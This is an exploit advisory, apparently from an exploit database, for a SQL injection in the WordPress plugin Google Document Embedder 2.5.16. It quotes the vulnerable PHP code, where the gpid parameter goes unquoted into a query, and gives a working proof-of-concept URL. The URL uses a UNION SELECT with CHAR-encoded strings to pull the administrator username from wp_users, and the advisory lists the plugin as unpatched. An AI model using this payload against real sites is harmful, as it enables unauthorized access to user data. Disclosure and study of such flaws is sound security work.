Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection
Data : 2014 – 12 -03
Exploit Author : Securely (Yoo Hee man)
Plugin : google-document-embedder
Fixed version : N/A
Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip
1. Detail
- Google Document Embedder v2.5.14 have SQL Injection
- This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection.
- but mysql_real_escape_string() function is bypass possible
- vulnerability file : /google-document-embedder/~view.php
================================================================
50 // get profile
51 if ( isset( $_GET['gpid'] ) ) {
52 $gpid = mysql_real_escape_string( $_GET['gpid'] );
//mysql_real_escape_string() is bypass
53 if ( $profile = gde_get_profile( $gpid ) ) {
54 $tb = $profile['tb_flags'];
55 $vw = $profile['vw_flags'];
56 $bg = $profile['vw_bgcolor'];
57 $css = $profile['vw_css'];
58 }
59 }
================================================================
===============================================================
373 function gde_get_profile( $id ) {
374 global $wpdb;
375 $table = $wpdb->prefix . 'gde_profiles';
376
377 $profile = $wpdb->get_results( "SELECT * FROM $table WHERE
profile_id = $id", ARRAY_A );
378 $profile = unserialize($profile[0]['profile_data']);
379
380 if ( is_array($profile) ) {
381 return $profile;
382 } else {
383 return false;
384 }
385 }
================================================================
2. POC
http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1
3. Solution:
Not patched
4. Discovered By : Securely(Yoo Hee man)
God2zuzu@naver.com